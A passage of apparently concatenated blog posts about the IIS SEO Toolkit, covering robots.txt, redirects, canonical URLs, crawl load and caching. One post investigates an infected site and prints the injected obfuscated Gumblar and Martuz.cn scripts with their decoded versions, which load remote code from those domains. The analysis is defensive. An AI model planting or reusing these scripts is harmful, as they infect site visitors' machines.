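To make the loop concrete, here is a minimal Python sketch, assuming a hypothetical site where every page, including /login itself, renders a "Sign in" link built from the current URL. `naive_login_link`, `safe_login_link` and `follow_sign_in_links` are illustrative names, not part of any framework; the "safe" variant shows one possible fix (don't nest the link on the login page), not the only one.

```python
from urllib.parse import urlencode, urlsplit


def naive_login_link(current_url: str) -> str:
    """Build the "Sign in" link the way many sites do: always point back here."""
    return "/login?" + urlencode({"returnUrl": current_url})


def safe_login_link(current_url: str) -> str:
    """Same link, but on the login page itself reuse the current URL instead of nesting it."""
    if urlsplit(current_url).path == "/login":
        return current_url
    return naive_login_link(current_url)


def follow_sign_in_links(build_link, start: str, clicks: int) -> list[str]:
    """Simulate a crawler that keeps following the "Sign in" link it finds on each page."""
    visited = []
    url = start
    for _ in range(clicks):
        url = build_link(url)
        visited.append(url)
    return visited


if __name__ == "__main__":
    for url in follow_sign_in_links(naive_login_link, "/page1.htm", 3):
        print(url)  # every click yields a new, longer URL for the same /login resource
    print(set(follow_sign_in_links(safe_login_link, "/page1.htm", 3)))  # a single URL
```

With the naive builder every click produces a brand-new URL for the same resource, which is exactly the pattern crawlers get stuck in.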

IIS SEO Toolkit

If you use the IIS SEO Toolkit, it will detect when the same resource (like login.aspx) is used too many times, varying only the query string, and will give you a violation like: Resource is used too many times.
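The idea behind this check is easy to approximate once you have a list of crawled URLs. This is a Python sketch, not the toolkit's actual rule: `overused_resources` is a hypothetical helper, and its default threshold of 500 simply reuses the figure Site Analysis applies.

```python
from collections import Counter
from urllib.parse import urlsplit


def overused_resources(crawled_urls, threshold=500):
    """Return {path: count} for paths reached through more than `threshold` distinct URLs."""
    distinct = set(crawled_urls)  # count each exact URL (path + query string) once
    per_path = Counter(urlsplit(url).path for url in distinct)
    return {path: n for path, n in per_path.items() if n > threshold}
```

Feeding it the URLs from a crawl that followed every /login?returnUrl=... variation would report /login with one entry per variation.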

 

So how do I fix this?

There are a few fixes, but by far the best thing to do is to add the login page to the Robots Exclusion list.

  1. Add the URL to /robots.txt. You can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop in a file with something like:
    User-agent: *
    Disallow: /login
  2. Alternatively (or additionally), you can add a rel attribute with the nofollow value to tell crawlers not to even try. Something like:
    <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
  3. Finally, use the Site Analysis feature in the IIS SEO Toolkit to make sure you don't have this kind of behavior. It automatically flags a violation when it identifies that the same "page" (with a different query string) has already been visited more than 500 times.
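You can sanity-check the robots.txt rule from step 1 with Python's standard urllib.robotparser module. This sketch parses the two-line file in memory (no network access) and asks whether a generic crawler may fetch a few sample URLs; the sample paths are illustrative.

```python
from urllib.robotparser import RobotFileParser

# The same two lines suggested in step 1.
ROBOTS_TXT = """\
User-agent: *
Disallow: /login
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

for url in ("/login", "/login?returnUrl=/page1.htm", "/page1.htm"):
    # Disallow rules are prefix matches, so every returnUrl variant is covered too
    print(url, "->", "allowed" if parser.can_fetch("*", url) else "blocked")
```

Because Disallow is a prefix match, /login also blocks anything else starting with /login (say, a hypothetical /login-help.htm), so use a more specific path if that matters for your site.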

Summary

To summarize, always add the login page to the robots exclusion file; otherwise you will end up:

  1. sacrificing valuable "search engine crawling time" in your site.
  2. spending unnecessary bandwidth and server resources.
  3. potentially even blocking crawlers from your content.

The other day a friend of mine who owns a Web site asked me to look at it to see if I could spot anything weird, since according to his Web hosting provider it was being flagged by Google as infected with malware.

My friend (who is not technical at all) talked to his Web site designer about the problem. The designer downloaded the HTML pages and looked for anything suspicious in them, but was not able to find anything. My friend then went back to his hosting provider, told them they had not found anything problematic, and asked whether it could be something in the server configuration, to which they replied sarcastically that it was probably his Web site designer's ignorance.

Enter IIS SEO Toolkit

Naturally, the first thing I did was crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources on his Web site. I knew that malware usually hides either in executables or in scripts on the server, so I started by looking at the different content types shown in the "Content Types Summary" inside the Content reports on the dashboard page.

[Image: Content Types Summary report]

I was surprised not to find a single executable, and to see only two very simple JavaScript files that did not look like malware in any way. From previous experience I knew that malware in HTML pages is usually hidden behind a funky-looking encoded script that uses the eval function to run the code. So I quickly ran a query for HTML pages that contain both the word eval and the word unescape. I know there are valid scripts that use those functions, since they exist for a reason, but it was a good way to narrow down the pages.
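The same scoping heuristic is easy to apply outside the toolkit, for example to pages downloaded from a server. A minimal Python sketch, assuming you have each response's Content-Type and body; `looks_obfuscated` is a hypothetical helper. Unlike a plain "contains" test it matches whole words only, and like the query it will also flag legitimate scripts that happen to use both functions.

```python
import re

# Whole-word matches, so names like "evaluate" or "unescaped" do not count.
_EVAL = re.compile(r"\beval\b")
_UNESCAPE = re.compile(r"\bunescape\b")


def looks_obfuscated(content_type: str, body: str) -> bool:
    """Flag HTML that calls both eval and unescape; it deserves a closer look."""
    if not content_type.lower().startswith("text/html"):
        return False
    return bool(_EVAL.search(body) and _UNESCAPE.search(body))
```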

Gumblar and Martuz.cn malware in sight

[Image: query for HTML pages containing eval and unescape]

After running the query, I got a set of HTML files that all returned status code 404 (Not Found). Double-clicking any of them and looking at the HTML markup made it immediately obvious that they were infected with malware; look at the following markup:

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!-- 
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
-->
</script><script language=javascript><!-- 
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
 
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>

Notice those two ugly scripts that look like a random jumble of numbers, quotes and letters? I do not believe I've ever met a developer who writes code like that in real Web applications.

For those of you who, like me, do not particularly enjoy reading encoded JavaScript: all these two scripts do is unescape the funky-looking string and then execute it with eval. I have decoded the scripts that would get executed and show them below to illustrate how this malware works. Note how they only target Windows browsers that do not report "NT 6" (Windows Vista/Windows 7) and that lack the miek=1 cookie, and how the second one also skips Chrome, before requesting the script that causes the real damage.

var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
}

And:

var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
}

Notice how both of them end up writing a script tag that loads the actual malware from gumblar.cn and martuz.cn.
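If you want to read payloads like these yourself without running them, the decoding step is easy to reproduce. In this Python sketch `decode_payload` is a hypothetical helper and urllib.parse.unquote stands in for JavaScript's unescape; the two agree for %XX escapes like the ones used here, though unquote does not understand unescape's %uXXXX form. Nothing in it executes the decoded text.

```python
from urllib.parse import unquote


def decode_payload(encoded: str, marker: str) -> str:
    """Undo the obfuscation: swap the marker character back to '%', then unescape."""
    return unquote(encoded.replace(marker, "%"))


# The first few characters of each payload from the infected 404 page.
print(decode_payload('va"72"20a"3d"22Scr"69pt"45ng"69ne"22', '"'))  # var a="ScriptEngine"
print(decode_payload("var~20~61~3d~22S~63~72i~70~74Engine~22", "~"))  # var a="ScriptEngine"
```

The first script uses a double quote as its escape marker and the second uses a tilde, which is what the `replace(/"/g, ...)` and `replace(/\~/g, ...)` calls in the markup undo.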

Final data

This clearly means the site is infected with malware, and it seems the problem is not in the Web application: the infection is in the error pages that the server returns when an error happens. Next, to guide them with more specifics, I needed to determine which Web server they were using. That is as easy as inspecting the headers in the IIS SEO Toolkit, which displayed something like the following:

Accept-Ranges: bytes
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

With the big disclaimer that I know nothing about Apache, I then pointed them to the ErrorDocument directives in their .htaccess and httpd.conf files, which would show them which files were being served as error pages, and therefore whether the problem was in their application or on the server.
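To find those directives quickly, a rough Python sketch like the following lists the ErrorDocument lines in a config file's text. `error_documents` is a hypothetical helper, not an Apache tool; it assumes the simple one-directive-per-line form (ErrorDocument, a three-digit status, then a local path, URL or quoted message) and ignores commented-out lines.

```python
import re

# ErrorDocument <3-digit status> <local path, URL, or quoted message>
_ERROR_DOCUMENT = re.compile(
    r"^[ \t]*ErrorDocument[ \t]+(\d{3})[ \t]+(.+?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,  # directive names are case-insensitive
)


def error_documents(config_text: str) -> dict[str, str]:
    """Map each status code to the document configured for it in this config text."""
    return {code: target for code, target in _ERROR_DOCUMENT.findall(config_text)}
```

Local paths it returns (such as /errors/404.html) point at the files worth inspecting for injected scripts.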

Case Closed

It turns out that after they went back to their hosting provider with all this evidence, the provider finally realized that the server was infected and was able to clean up the malware. The IIS SEO Toolkit helped me identify this quickly because it sees the Web site with the same eyes as a search engine, following every link and letting me run easy queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to find this kind of thing in much simpler ways, but for Beta 1, for those who care, here is the query: save it in an XML file and use "Open Query" to see if you are infected with this malware.

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <expression field="FileContents" operator="Contains" value="unescape" />
    <expression field="FileContents" operator="Contains" value="eval" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="StatusCode" />
    <field name="Title" />
    <field name="Description" />
  </displayFields>
</query>

The other day somebody asked me if there was a way to limit the amount of load that Site Analysis in the IIS SEO Toolkit puts on the server. This is interesting for a couple of reasons:

  • You might want to reduce the load that Site Analysis causes on your server at any given time
  • You might have a denial-of-service detection system, such as our Dynamic IP Restrictions IIS module, that will start failing requests based on the number of requests in a certain amount of time
  • Or, if like me you have to go through a proxy, it might have a configured limit on the number of requests per minute you are allowed to issue

In Beta 1 we do not support the Crawl-delay directive of the Robots Exclusion Protocol; in future versions we will look at adding support for this setting. The good news is that Beta 1 does have a configurable setting that can help you achieve these goals, called Maximum Number of Concurrent Requests.

To set it:

  1. Go to the Site Analysis Reports page
  2. Select the option "Edit Feature Settings..." as shown in the next image
    [Image: the "Edit Feature Settings..." option]
  3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option, which you can set to any value from 1 to 16. The default value is 8, which means that at any given time we will issue at most 8 requests to the server.
    [Image: the Maximum Number of Concurrent Requests setting]
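To illustrate what a cap on concurrent requests means (not how the toolkit implements it), here is a Python sketch in which a thread pool's max_workers limits how many fetches are in flight at once. `crawl` and `FakeServer` are hypothetical names; the fake server only records the peak number of simultaneous requests, and the 1 to 16 range simply mirrors the dialog.

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor


def crawl(urls, fetch, max_concurrent_requests=8):
    """Call fetch(url) for each URL with at most max_concurrent_requests in flight."""
    if not 1 <= max_concurrent_requests <= 16:
        raise ValueError("expected a value from 1 to 16, like the dialog")
    with ThreadPoolExecutor(max_workers=max_concurrent_requests) as pool:
        return list(pool.map(fetch, urls))  # results come back in input order


class FakeServer:
    """Stand-in for the Web server: records the peak number of simultaneous requests."""

    def __init__(self):
        self._lock = threading.Lock()
        self._active = 0
        self.peak = 0

    def fetch(self, url):
        with self._lock:
            self._active += 1
            self.peak = max(self.peak, self._active)
        time.sleep(0.01)  # pretend the request takes a little while
        with self._lock:
            self._active -= 1
        return url


if __name__ == "__main__":
    server = FakeServer()
    crawl([f"/page{i}.htm" for i in range(40)], server.fetch, max_concurrent_requests=2)
    print("peak concurrent requests:", server.peak)  # never more than 2
```

Lowering the limit trades total crawl time for a gentler, steadier load on the server or proxy.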

In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily. Redirects are an important tool for Web sites, and in the right context they are actually required. But first, a bit of background.

What is a Redirect?

In simple terms, a redirect is a way for the server to tell a client (typically a browser) that a resource has moved, which it does by using an HTTP status code and an HTTP Location header. There are different types of redirects, but the most commonly used are:

  • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header.
  • 302 - Found (also called Redirect). This type of redirect signals that the resource is temporarily located somewhere else, but any further attempts to access it should still go to the original location.

Below is an example of the response sent by the server when requesting http://www.microsoft.com/SQL/:

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html; charset=utf-8
Date: Wed, 10 Jun 2009 17:04:09 GMT
Location: /sqlserver/2008/en/us/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
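Reading a response like this one boils down to two questions: is the redirect permanent or temporary, and where does it point? A Python sketch of that decision, limited to the 301 and 302 codes discussed here; `describe_redirect` is a hypothetical helper and assumes the headers arrive as a dict with the exact key "Location".

```python
from http import HTTPStatus
from urllib.parse import urljoin

# The two redirect types discussed above and what they tell a crawler.
REDIRECT_KINDS = {
    HTTPStatus.MOVED_PERMANENTLY: "permanent",  # 301: credit and index the new location
    HTTPStatus.FOUND: "temporary",  # 302: the original URL is still the "real" one
}


def describe_redirect(request_url, status, headers):
    """Return (kind, absolute target URL), or None when the response is not a 301/302."""
    kind = REDIRECT_KINDS.get(HTTPStatus(status))
    if kind is None:
        return None
    location = headers.get("Location")
    if not location:
        # A redirect without a Location header gives the client nowhere to go
        raise ValueError(f"{status} response from {request_url} has no Location header")
    # Location may be relative, as in the response above, so resolve it
    return kind, urljoin(request_url, location)
```

For the response above, `describe_redirect("http://www.microsoft.com/SQL/", 302, {"Location": "/sqlserver/2008/en/us/default.aspx"})` reports a temporary redirect to http://www.microsoft.com/sqlserver/2008/en/us/default.aspx.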

 

So what do redirects mean for SEO?

One of the most important factors in SEO is a concept called organic linking; in simple words, your page gets extra points for every link that external Web sites have pointing to it. Now imagine the search engine bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page), and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). The search engine now has to decide whether to add the original "some-page" to its index, whether to "add the extra points" to the new location or to the original one, or whether to ignore it entirely. The answer is not that simple, but a simplification could be:

  • If you return a 301 (Permanent Redirect), you are telling the search engine that the resource moved permanently to a new location and that all further traffic should be directed there. This clearly means the search engine should ignore the original location (some-page), index the new location (somepage), add all the "extra points" to it, and treat any further references to the original location as references to the new one.
  • If you return a 302 (Temporary Redirect), the behavior depends on the search engine, but it is likely to index the original location and ignore the new location entirely (unless it is linked directly from other places), since the redirect is only temporary and the server could at any point stop redirecting and start serving the content from the original location. This of course makes it ambiguous how to deal with the "extra points", which will likely be credited to the original location rather than the new destination.

 

Enter IIS SEO Toolkit

The IIS Search Engine Optimization Toolkit has several rules that look for different patterns related to redirects. The Beta version includes the following:

  1. The redirection did not include a location header. Believe it or not, there are applications out there that do not generate a Location header, which completely breaks the model of redirection. So if your application is one of them, it will let you know.
  2. The redirection response results in another redirection. In this case it detected that your page (A) links to another page (B), which redirects to another page (C), which in turn redirects to yet another page (D). It is letting you know that this chain of redirects could significantly reduce the SEO "bonus points", since the organic linking could be broken by all this jumping around, and that you should consider linking directly from (A) to (D), or to whatever page is supposed to be the final destination.
  3. The page contains unnecessary redirects. In this case it detected that your page (A) links to another page (B) in your Web site that redirects to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you want this behavior, such as tracking page impressions or login pages, but in many cases you do not need them. Since you own all three pages, it suggests checking whether it would be better to change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
  4. The page uses a refresh definition instead of using redirection. Finally, related to redirection, IIS SEO will flag pages that use the refresh meta tag as a means of causing a redirection. This practice is not recommended, since the tag carries no semantics telling search engines how to process the content, and in many cases it is actually considered a tactic to confuse search engines, but I won't go there.
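The ideas behind rules 2 and 4 can be sketched in a few lines of Python. This is an illustration under stated assumptions, not the toolkit's implementation: `redirect_chain` assumes you already have a hypothetical `redirects` mapping from each redirecting URL to its Location, and `MetaRefreshFinder` uses the standard library's html.parser to spot refresh meta tags.

```python
from html.parser import HTMLParser


def redirect_chain(url, redirects, max_hops=10):
    """Follow `redirects` (URL -> Location) from `url` and return every URL visited."""
    chain = [url]
    while chain[-1] in redirects:
        target = redirects[chain[-1]]
        if target in chain:
            raise ValueError("redirect loop: " + " -> ".join(chain + [target]))
        if len(chain) > max_hops:
            raise ValueError("too many redirects starting at " + url)
        chain.append(target)
    return chain


class MetaRefreshFinder(HTMLParser):
    """Collect the content of any <meta http-equiv="refresh"> tag in a page."""

    def __init__(self):
        super().__init__()
        self.refresh = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "meta" and (attributes.get("http-equiv") or "").lower() == "refresh":
            self.refresh.append(attributes.get("content"))


if __name__ == "__main__":
    # Page A links to B; B -> C -> D are redirects (rule 2 in the list above).
    chain = redirect_chain("/B", {"/B": "/C", "/C": "/D"})
    if len(chain) > 2:
        print("redirect to a redirect; link straight to", chain[-1])
    finder = MetaRefreshFinder()
    finder.feed('<meta http-equiv="Refresh" content="0; url=/new-page">')
    print("meta refresh found:", finder.refresh)
```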

So what does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

[Image: Site Analysis violations related to redirects]

Notice that when you double-click a violation it shows you the details and gives you direct access to the related URLs, so you can look at the content and all the relevant information about them to make a decision. From that menu you can also see which other pages link to the different pages involved, as well as launch them in the browser if needed.

[Image: violation details]

As with all the other violations, it tries to explain why the issue is being flagged and recommends actions to take for each one.

The IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects, and where they are used, very easily: just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 KB (note that I've seen Web sites generate a large amount of useless content in redirect traffic; talk about wasted bandwidth). You can double-click any of those rows to see the details of the URLs that returned that status code, and from there you can see who links to them, etc.

[Image: Status Code Summary report]

So what should I do?

  1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
  2. Try to minimize redirections. Using the knowledge gained in step 1, look for places where you can update your content to reduce the number of redirects.
  3. Use the right redirect. Understand the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary?). Whenever possible, prefer permanent (301) redirects.
  4. Use URL Rewrite to easily configure them. URL Rewrite lets you configure a set of rules, using regular expressions or wildcards, that live alongside your application (no administrative privileges required) and set the right redirection status code. A must for SEO. More on this in a future blog post.

Summary

So, going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily; they are an important tool used by Web applications for many reasons, such as:

  • Canonicalization. To ensure that users access your site either with www. or without it, use permanent redirects.
  • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
  • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
  • etc
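For canonicalization, the decision a redirect rule makes is simple: if the request came in on a host alias, answer with a 301 to the same path on the canonical host. In practice you would configure this with URL Rewrite; the Python below only sketches the decision, using placeholder host names (example.com and www.example.com) and a hypothetical `canonical_redirect` helper.

```python
from urllib.parse import urlsplit, urlunsplit


def canonical_redirect(url, canonical_host="www.example.com", aliases=("example.com",)):
    """Return (301, canonical URL) when `url` uses a host alias, else None."""
    parts = urlsplit(url)
    if parts.hostname not in aliases:  # hostname is already lowercased
        return None
    # Keep scheme, path and query string; only the host changes
    return 301, urlunsplit(parts._replace(netloc=canonical_host))
```

Keeping the path and query string intact matters: redirecting every alias request to the home page would throw away the link equity of deep links.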

Just make sure you don't abuse them: avoid redirects to redirects, unnecessary redirects and infinite loops, and use the right semantics.


Today somebody was running the IIS SEO Toolkit, and the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats." The reason, apparently, is that he uses query string parameters to pass contextual information between pages. This of course raises the question: does that mean query strings are generally bad news SEO-wise?

Well, the answer is not necessarily.

I will start by clarifying that this violation in Site Analysis means our algorithm detected that two URLs appear to serve the same content; note that we make no assumptions based on the URL (including query string parameters). This kind of situation is bad for a couple of reasons:

  1. Because they look like the same page, search engines will probably choose one of them to index as the real content and discard the other. The problem is that you are leaving this decision to search engines, which means some might choose the wrong version and end up using the one with query string parameters instead of the clean one (not likely, though). Or, even worse, they might end up indexing both of them as if they were different pages.
  2. When other Web sites link to your content, some of them might use the URL with query string parameters and some might not. This means organic linking will not give you the full benefit it otherwise would. Remember, search engines give you "extra" points when somebody external references your page, but now you'll be splitting those earnings between "two pages" instead of a single canonical form.
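The toolkit's actual detection algorithm isn't described here, so as a stand-in, this is a deliberately crude Python sketch of the general idea: fingerprint each page's text and group URLs whose fingerprints match, ignoring the URLs themselves. `fingerprint` and `duplicate_groups` are hypothetical helpers; stripping tags with a regex and hashing exact text is far simpler than what a real near-duplicate detector would do.

```python
import hashlib
import re
from collections import defaultdict


def fingerprint(html):
    """Crude content fingerprint: drop tags, collapse whitespace, lowercase, hash."""
    text = re.sub(r"<[^>]+>", " ", html)
    text = " ".join(text.split()).lower()
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def duplicate_groups(pages):
    """Group URLs whose content fingerprints match; `pages` maps URL -> HTML."""
    groups = defaultdict(list)
    for url, html in pages.items():
        groups[fingerprint(html)].append(url)
    return [sorted(urls) for urls in groups.values() if len(urls) > 1]
```

Two URLs that differ only in a tracking parameter, such as /product.aspx?id=7 and /product.aspx?id=7&ref=home, end up in the same group when they render the same text.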

Query strings by themselves do not pose a terrible threat to SEO, and most modern search engines deal OK with them; however, it's the organic linking and the potential abuse of query strings that could give you headaches.

Remember, search engines cannot assume that URLs sharing a single absolute path are the same "page", since many sites serve tons of different content through one path plus query strings. This is typical, for example, with index.php, where pretty much every page on the site is served by the same resource using variations of query strings or path information.

 

So what should I do?

Well, there are several things you could do, but probably one of the easiest is to tell search engines (more specifically, crawlers or bots) not to crawl the query string variations that are really meant only for the application to pass state, not to specify different content. This can be done with the Robots Exclusion Protocol, using wildcard matching to tell them not to follow any URLs that contain a '?'. Make sure you are not blocking URLs that are actually supposed to be indexed; for this you can run the Site Analysis feature again, and it will flag an informational message for each URL that is not visited because of the robots exclusion file.

User-agent: *
Disallow: /*?
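The * wildcard is an extension to the original robots exclusion protocol (later written into RFC 9309), and Python's urllib.robotparser does not implement it, so this sketch hand-rolls the matching with regular expressions to check which URLs a pattern like /*? blocks. `rule_to_regex` and `is_disallowed` are hypothetical helpers that look only at Disallow patterns and ignore Allow lines and their precedence rules, so treat them as a quick checker rather than a full parser.

```python
import re


def rule_to_regex(rule_path):
    """Translate a robots.txt path pattern into a regex: '*' = any characters, '$' = end."""
    anchored = rule_path.endswith("$")
    body = rule_path[:-1] if anchored else rule_path
    pattern = ".*".join(re.escape(piece) for piece in body.split("*"))
    return re.compile(pattern + ("$" if anchored else ""))


def is_disallowed(path_and_query, disallow_rules):
    """True when any Disallow pattern matches from the start of the path."""
    return any(rule_to_regex(rule).match(path_and_query) for rule in disallow_rules)
```

With the rule above, `is_disallowed("/default.aspx?tab=2", ["/*?"])` is True while `is_disallowed("/default.aspx", ["/*?"])` is False, so the clean URL stays crawlable.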

 

In summary, keep your URLs in canonical form yourself and don't leave any guesswork to search engines, because some of them might get it wrong. There is also a new way of specifying the canonical form in your markup, the rel="canonical" link element, but it is very recent (as in 2009) and some search engines do not support it yet (I believe the top three do, though):

<link rel="canonical" href="http://www.my-site.com/my-canonical-url" />
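When auditing pages, it can help to check which URL each page declares as canonical. A minimal sketch using Python's built-in html.parser; `CanonicalFinder` and `canonical_url` are hypothetical helpers, and a real crawler would also resolve relative href values against the page URL.

```python
from html.parser import HTMLParser


class CanonicalFinder(HTMLParser):
    """Remember the href of the first <link rel="canonical"> in a page."""

    def __init__(self):
        super().__init__()
        self.canonical = None

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        rels = (attributes.get("rel") or "").lower().split()  # rel can hold several values
        if tag == "link" and "canonical" in rels and self.canonical is None:
            self.canonical = attributes.get("href")


def canonical_url(html):
    """Return the declared canonical URL, or None when the page has no hint."""
    finder = CanonicalFinder()
    finder.feed(html)
    return finder.canonical
```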

In the Beta 2 version of the IIS SEO Toolkit we will support this tag and have better detection of these canonical issues, so stay tuned.

Another way to solve this is to use URL Rewrite to redirect or rewrite your URLs, getting rid of the query strings in favor of more SEO-friendly URLs.


One easy way to enhance the experience of users visiting your Web site, by increasing the perceived performance of navigating it, is to reduce the number of HTTP requests required to display a page. There are several techniques for achieving this, such as merging scripts into a single file or merging images into one big image, but by far the simplest is making sure that you cache as much as you can on the client. This not only reduces rendering time but also reduces the load on your server and your bandwidth consumption.

Unfortunately, the different types of caches and the different ways of setting them can be quite confusing and esoteric. So my recommendation is to pick one way and use it all the time, and that way is the HTTP 1.1 Cache-Control header.

So first of all, how do I know whether my application is well behaved and sends the right headers so browsers can cache its resources? You can use a network monitor or tools like Fiddler or wfetch to look at the headers and figure out whether they are being sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

Enter Site Analysis - IIS Search Engine Optimization Toolkit

To figure out if your images are sending the right headers you can follow the next steps:

  1. Install the IIS Search Engine Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
  2. Launch InetMgr.exe (IIS Manager) and crawl your Web site. For more details on how to do that, refer to the article "Using Site Analysis to crawl a web site".
  3. Once you are in the Site Analysis dashboard view, start a new query using the menu "Query->New Query" and add the following criteria:
    1. Is External - Equals - False -> To include only the files that come from your Web site.
    2. Status code - Equals - OK -> To include only successful requests
    3. Content Type Normalized - Begins With - image/ -> To include only images
    4. Headers - Not Contains - Cache-Control: -> To include only the ones that do not have the Cache-Control header
    5. Headers - Not Contains - Expires: -> To include only the ones that do not have the Expires header
    6. Press Execute, and this will display all the images in your Web site that do not specify any caching behavior.
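If you would rather check responses in a script (for example, ones saved from Fiddler), the same five criteria translate directly. A Python sketch, assuming each response's headers are available as a dict; `missing_cache_headers` is a hypothetical helper, and "OK" is taken to mean status code 200.

```python
def missing_cache_headers(is_external, status_code, content_type, headers):
    """Mirror the query: internal, 200 OK images that send neither Cache-Control nor Expires."""
    names = {name.lower() for name in headers}  # header names are case-insensitive
    return (
        not is_external
        and status_code == 200
        and content_type.lower().startswith("image/")
        and "cache-control" not in names
        and "expires" not in names
    )
```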

Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="IsExternal" operator="Equals" value="False" />
    <expression field="StatusCode" operator="Equals" value="OK" />
    <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <expression field="Headers" operator="NotContains" value="Expires:" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="ContentTypeNormalized" />
    <field name="StatusCode" />
  </displayFields>
</query>

How do I fix it?

